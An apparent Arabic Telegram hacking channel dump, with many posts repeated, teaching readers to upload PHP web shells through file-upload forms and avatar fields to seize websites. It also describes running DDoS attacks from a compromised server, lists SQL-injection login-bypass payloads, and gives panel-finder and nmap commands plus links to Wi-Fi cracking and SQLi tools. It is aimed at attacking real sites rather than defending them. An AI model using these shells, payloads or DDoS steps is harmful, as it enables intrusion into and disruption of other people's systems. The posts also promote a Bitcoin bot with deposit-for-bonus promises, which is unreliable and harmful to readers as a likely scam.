#تعلم_الاختراق
#الدرس_الخامس
ثغرة file upload - الشيل
عندما نتمكن من اختراق موقع لوحة تحكم موقع مثلاً .. لن نتمكن من السيطرة على الموقع بشكل كامل .. فما نستطيع فعله مقيد بلوحة التحكم هذه
فإذا كانت لوحة التحكم مصممة لإضافة وحذف أعضاء مثلاً فكل ما سنتمكن من فعله هو إضافة وحذف أعضاء فقط
هنا تأتي أهمية الشيل .. فإذا تمكنّا من رفع شيل على الموقع فسنتمكن من التحكم بالموقع بشكل كامل وقد نتمكن من اختراق جميع المواقع الموجودة على نفس السيرفر إذا تمكنّا من الحصول على صلاحيات الروت على السيرفر ..
ولكن ما هو الشيل ؟
الشيل Shell هو برنامج عادي .. مكتوب بلغة php في معظم الأحيان أو لغات أخرى مثل python - perl ...
يمكننا عن طريقه التحكم بالموقع كما نشاء إذا تمكنّا من رفع شيل عليه .. أما طريقة الدخول إليه فهي عن طريق المتصفح .. بوضع رابط الشيل في المتصفح وسندخل إليه مباشرةً .. بالطبع ستفهم ذلك بشكل أفضل عند التطبيق العملي
هناك عدة أنواع للشيل مثل c99 و غيرها ولكن أنا أفضّل شيل ألفا Alfa لأن فيه الكثير من الميزات .. يمكنك تحميله أسفل المنشور 👇🏻 ( لن تتمكن من فتحه على جهازك إذا كان لا يدعم لغة الphp .. أما مواقع الانترنت فمعظمها يدعمها )
هناك عدة طرق لرفع شيل على الموقع .. مثلاً عن طريق لوحة التحكم إذا كانت تدعم خاصية رفع الملفات .. أو يمكنك مثلاً عند تسجيل حساب في موقع وتريد وضع صورة شخصية لك ... يمكنك اخيار ملف الشيل ليتم رفعه بدلاً من الصورة ثم تدخل إليه بضغط زر اليمين على الصورة ثم " عرض الصورة " في متصفح فايرفوكس ( إذا أردت احتراف اختراق المواقع فأنصحك بشدة أن تستخدم الحاسوب ومتصفح firefox أيضاً لأن هناك الكثير من الثغرات التي تعتمد على الإضافات التي يمكن تثبيتها عليه )
من الطرق التي يمكنك أيضاً رفع شيل بها هي ثغرة file upload
ثغرة رفع الملفات File upload :
قد يقوم المبرمج عند تصميم موقع ما بإضافة صفحة لرفع ملفات على الموقع .. هذه الميزة مفيدة لتسهيل عملية رفع ملف إلى الموقع ليتمكن زوار الموقع من تحميله ..
ولكنها في نفس الوقت خطيرة ... فإذا قام الهاكر برفع شيل على الموقع فإنه سيسيطر عليه بشكل كامل .. وهذه هي فكرة الثغرة
قد تجد في موقع ما صفحةً لرفع الملفات مثلاً
http://site.com/plugins/file_uploader.php
فعند الدخول إليها يظهر أمامك زر اختيار ملف تضغط عليه وتختار ملف الشيل ثم تضغط رفع أو upload ليتم رفع الملف .. وبالدخول إلى رابط الملف ستدخل إلى الشيل
انتظر الأمثلة للتطبيق العملي ..
#NullByteStream_team
#الدرس_الخامس
ثغرة file upload - الشيل
عندما نتمكن من اختراق موقع لوحة تحكم موقع مثلاً .. لن نتمكن من السيطرة على الموقع بشكل كامل .. فما نستطيع فعله مقيد بلوحة التحكم هذه
فإذا كانت لوحة التحكم مصممة لإضافة وحذف أعضاء مثلاً فكل ما سنتمكن من فعله هو إضافة وحذف أعضاء فقط
هنا تأتي أهمية الشيل .. فإذا تمكنّا من رفع شيل على الموقع فسنتمكن من التحكم بالموقع بشكل كامل وقد نتمكن من اختراق جميع المواقع الموجودة على نفس السيرفر إذا تمكنّا من الحصول على صلاحيات الروت على السيرفر ..
ولكن ما هو الشيل ؟
الشيل Shell هو برنامج عادي .. مكتوب بلغة php في معظم الأحيان أو لغات أخرى مثل python - perl ...
يمكننا عن طريقه التحكم بالموقع كما نشاء إذا تمكنّا من رفع شيل عليه .. أما طريقة الدخول إليه فهي عن طريق المتصفح .. بوضع رابط الشيل في المتصفح وسندخل إليه مباشرةً .. بالطبع ستفهم ذلك بشكل أفضل عند التطبيق العملي
هناك عدة أنواع للشيل مثل c99 و غيرها ولكن أنا أفضّل شيل ألفا Alfa لأن فيه الكثير من الميزات .. يمكنك تحميله أسفل المنشور 👇🏻 ( لن تتمكن من فتحه على جهازك إذا كان لا يدعم لغة الphp .. أما مواقع الانترنت فمعظمها يدعمها )
هناك عدة طرق لرفع شيل على الموقع .. مثلاً عن طريق لوحة التحكم إذا كانت تدعم خاصية رفع الملفات .. أو يمكنك مثلاً عند تسجيل حساب في موقع وتريد وضع صورة شخصية لك ... يمكنك اخيار ملف الشيل ليتم رفعه بدلاً من الصورة ثم تدخل إليه بضغط زر اليمين على الصورة ثم " عرض الصورة " في متصفح فايرفوكس ( إذا أردت احتراف اختراق المواقع فأنصحك بشدة أن تستخدم الحاسوب ومتصفح firefox أيضاً لأن هناك الكثير من الثغرات التي تعتمد على الإضافات التي يمكن تثبيتها عليه )
من الطرق التي يمكنك أيضاً رفع شيل بها هي ثغرة file upload
ثغرة رفع الملفات File upload :
قد يقوم المبرمج عند تصميم موقع ما بإضافة صفحة لرفع ملفات على الموقع .. هذه الميزة مفيدة لتسهيل عملية رفع ملف إلى الموقع ليتمكن زوار الموقع من تحميله ..
ولكنها في نفس الوقت خطيرة ... فإذا قام الهاكر برفع شيل على الموقع فإنه سيسيطر عليه بشكل كامل .. وهذه هي فكرة الثغرة
قد تجد في موقع ما صفحةً لرفع الملفات مثلاً
http://site.com/plugins/file_uploader.php
فعند الدخول إليها يظهر أمامك زر اختيار ملف تضغط عليه وتختار ملف الشيل ثم تضغط رفع أو upload ليتم رفع الملف .. وبالدخول إلى رابط الملف ستدخل إلى الشيل
انتظر الأمثلة للتطبيق العملي ..
#NullByteStream_team
موقع مصاب لتعلم رفع الشيل من تصميمي ..
الصفحة الرئيسية للموقع فيها خيار رفع ملف إلى الموقع .. بعد رفع الملف بنجاح ستعطيك رابط الدخول إلى الملف ..
جرب رفع الشيل عليها ( عدل اسم ملف الشيل قبل الرفع وضع اسمك عليه مثلاً حتى لا تختلط الملفات مع بعضها )
رابط الموقع
http://nullbytestream-testlabs.atwebpages.com
الصفحة الرئيسية للموقع فيها خيار رفع ملف إلى الموقع .. بعد رفع الملف بنجاح ستعطيك رابط الدخول إلى الملف ..
جرب رفع الشيل عليها ( عدل اسم ملف الشيل قبل الرفع وضع اسمك عليه مثلاً حتى لا تختلط الملفات مع بعضها )
رابط الموقع
http://nullbytestream-testlabs.atwebpages.com
لاحظت مشكلة صغيرة في شيل ألفا .. وهي أن بعض ميزاته قد تتعطل إذا تم تغيير اسم الملف .. لذلك عند استخدامه اترك اسمه كما هو ALFA3.php
هجوم Ddos من شيل ألفا ( من سيرفر الموقع ) .. نحدد البروتوكول TCP وعنوان الآي بي ومدة الهجوم والبورت ( المنفذ ) للهجوم عليه .. في مواقع الانترنت نضع المنفذ 80 وهو المنفذ المستخدم لخدمة http .. بالطبع سيكون الهجوم قوياً لأن اتصال الانترنت للسيرفر سريع جداً
لا تترك مكان الآي بي localhost وتبدأ الهجمة لأنك ستتسبب بتعطيل السيرفر .. لأن localhost تعني عنوان الجهاز نفسه
لا تترك مكان الآي بي localhost وتبدأ الهجمة لأنك ستتسبب بتعطيل السيرفر .. لأن localhost تعني عنوان الجهاز نفسه
سطر اوامر لينكس.pdf
3.2 MB
كتاب مفيد للمبتدئين في نظام لينوكس .. تعلم التعامل مع موجه الأوامر terminal .. فيه شرح لأهم الأوامر
طريقة إيجاد لوحة تحكم موقع
عن طريق أداة admin panel finder على التيرمكس أو الكالي لينوكس ( تعمل على معظم الأنظمة )
تحميل الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
cd admin-panel-finder
python2 admin-panel-finder.py
ثم أدخل اسم الموقع واضغط Enter لتقوم الأداة بتجربة العديد من الروابط وإيجاد رابط لوحة التحكم
#NullByteStream_team
عن طريق أداة admin panel finder على التيرمكس أو الكالي لينوكس ( تعمل على معظم الأنظمة )
تحميل الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
cd admin-panel-finder
python2 admin-panel-finder.py
ثم أدخل اسم الموقع واضغط Enter لتقوم الأداة بتجربة العديد من الروابط وإيجاد رابط لوحة التحكم
#NullByteStream_team
أداة nmap تعد من أقوى الأدوات لفحص المواقع .. فهي تكشف المنافذ المفتوحة في الموقع والخدمات المستخدمة والكثير من الميزات الأخرى .. كما يمكن عن طريقها فحص عناوين الآي بي ضمن مجال محدد ( لتحديد العناوين الموجودة على الشبكة - يفيد في تحديد الأجهزة المتصلة معك على نفس الشبكة مثلاً مع نوع الجهاز كما تحاول تحديد نظام التشغيل ..... )
أولاً تثبيت الأداة (الأداة مثبتة مسبقاً على نظام الكالي لينوكس ) :
apt-get install nmap
أو
pkg install nmap
انتظر حتى اكتمال التثبيت
الآن لنجرب الأوامر الأساسية
nmap site.com
ضع مكان site.com اسم موقع أو عنوان آي بي لتقوم الأداة بفحصه وكشف المنافذ المفتوحة و ...
nmap 192.168.1.*
لفحص الأجهزة المتصلة معك على نفس الشبكة ( قم بتغيير الآي بي إلى عنوان شبكتك ) حيث ستقوم الأداة بفحص عناوين الآي بي بالترتيب
192.168.1.0
192.168.1.1
192.168.1.2 .....
قد تلاحظ أن الأداة تفحص المنافذ ضمن المجال من 1 إلى 1000 فقط .. إذا أردت أن تقوم الأداة بفحص جميع المنافذ ( من 1 إلى 65535 ) ضع -p-
nmap -p- 192.168.1.1
لمحاولة كشف نظام التشغيل .. نضيف -O
nmap -O 192.168.1.1
لإجراء فحص شامل لنظام التشغيل وكشف الإصدار والسكريبت و ... نضيف -A
nmap -A 192.168.1.1
بالطبع قد تستغرق الأداة وقتاً طويلاً عند إجراء فحص كبير مثل فحص جميع المنافذ
ميزات وإمكانيات الأداة أكبر من ذلك بكثير .. ولكن ذكرت المبادئ الأساسية
#NullByteStream_team
أولاً تثبيت الأداة (الأداة مثبتة مسبقاً على نظام الكالي لينوكس ) :
apt-get install nmap
أو
pkg install nmap
انتظر حتى اكتمال التثبيت
الآن لنجرب الأوامر الأساسية
nmap site.com
ضع مكان site.com اسم موقع أو عنوان آي بي لتقوم الأداة بفحصه وكشف المنافذ المفتوحة و ...
nmap 192.168.1.*
لفحص الأجهزة المتصلة معك على نفس الشبكة ( قم بتغيير الآي بي إلى عنوان شبكتك ) حيث ستقوم الأداة بفحص عناوين الآي بي بالترتيب
192.168.1.0
192.168.1.1
192.168.1.2 .....
قد تلاحظ أن الأداة تفحص المنافذ ضمن المجال من 1 إلى 1000 فقط .. إذا أردت أن تقوم الأداة بفحص جميع المنافذ ( من 1 إلى 65535 ) ضع -p-
nmap -p- 192.168.1.1
لمحاولة كشف نظام التشغيل .. نضيف -O
nmap -O 192.168.1.1
لإجراء فحص شامل لنظام التشغيل وكشف الإصدار والسكريبت و ... نضيف -A
nmap -A 192.168.1.1
بالطبع قد تستغرق الأداة وقتاً طويلاً عند إجراء فحص كبير مثل فحص جميع المنافذ
ميزات وإمكانيات الأداة أكبر من ذلك بكثير .. ولكن ذكرت المبادئ الأساسية
#NullByteStream_team
بعض أكواد الاستغلال لثغرة Admin Bypass لتخطي كلمة سر لوحة التحكم المصابة
'or'
"or"
'=' 'or'
"=" "or"
'or''='
"or""="
')or(''='
")or(""="
A' or '1'='1
......
أكواد من تصميمي - قد تعمل إذا لم تنجح الأكواد السابقة
'or'1'='1'or'
"or"1"="1"or"
جرب كل الاحتمالات قد ينجح أحدها
#NullByteStream_team
'or'
"or"
'=' 'or'
"=" "or"
'or''='
"or""="
')or(''='
")or(""="
A' or '1'='1
......
أكواد من تصميمي - قد تعمل إذا لم تنجح الأكواد السابقة
'or'1'='1'or'
"or"1"="1"or"
جرب كل الاحتمالات قد ينجح أحدها
#NullByteStream_team
البوت الأول
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
صورة إثبات السحب 👆
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
Forwarded from Project Sigma
تم إنشاء موقع للفريق وسنتابع شرح الدروس عليه لسهولة وضع الصور والأكواد ضمن الشرح ولأن بعض الدروس طويلة جداً ومن الصعب نشرها على القناة مباشرةً
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
سنعيد نشر الدروس السابقة على الموقع .. وقد أضيف بعض الصور الإضافية للتوضيح
#تعلم_الاختراق
#الدرس_الأول
الرابط
http://adfoc.us/47885071290428
#اختراق_الأجهزة
#الدرس_الأول
الرابط
http://adfoc.us/47885071290652
بعد الدخول إلى الرابط انتظر 5 ثواني ثم اضغط على زر
skip
أعلى ويمين الصفحة
#تعلم_الاختراق
#الدرس_الأول
الرابط
http://adfoc.us/47885071290428
#اختراق_الأجهزة
#الدرس_الأول
الرابط
http://adfoc.us/47885071290652
بعد الدخول إلى الرابط انتظر 5 ثواني ثم اضغط على زر
skip
أعلى ويمين الصفحة
Forwarded from Project Sigma - Advanced PT
#اختراق_شبكات_الوايفاي
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
طريقة التحقق مما إذا كان كرت الوايرلس لجهازك يدعم الmonitoring ( لاختراق شبكات الواي فاي - الدرس السابق )
بالأمر التالي :
هذا الأمر يسرد قائمة بالأوامر والأوضاع المتوفرة لكرت الوايرلس
بعد كتابة الأمر ستظهر قائمة طويلة .. إذا وجدت كلمة monitor فالجهاز يدعمها
كما في الصورة في الأسفل 👇🏻
#NullByteStream_team
بالأمر التالي :
iw listهذا الأمر يسرد قائمة بالأوامر والأوضاع المتوفرة لكرت الوايرلس
بعد كتابة الأمر ستظهر قائمة طويلة .. إذا وجدت كلمة monitor فالجهاز يدعمها
كما في الصورة في الأسفل 👇🏻
#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection
مقدمة في ثغرة حقن قواعد البيانات
هذا الموضوع ضخم جداً .. ولشرحه بشكل جيد وكامل قمت بتقسيمه إلى عدة أجزاء
#القسم_الأول
رابط الشرح
http://dwindly.io/nRb1JE
بعد الدخول للرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
#الدرس_السادس
ثغرة Sql Injection
مقدمة في ثغرة حقن قواعد البيانات
هذا الموضوع ضخم جداً .. ولشرحه بشكل جيد وكامل قمت بتقسيمه إلى عدة أجزاء
#القسم_الأول
رابط الشرح
http://dwindly.io/nRb1JE
بعد الدخول للرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
رابط تحميل تطبيق DroidSqli للأندرويد لاستغلال ثغرة Sql Injection
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team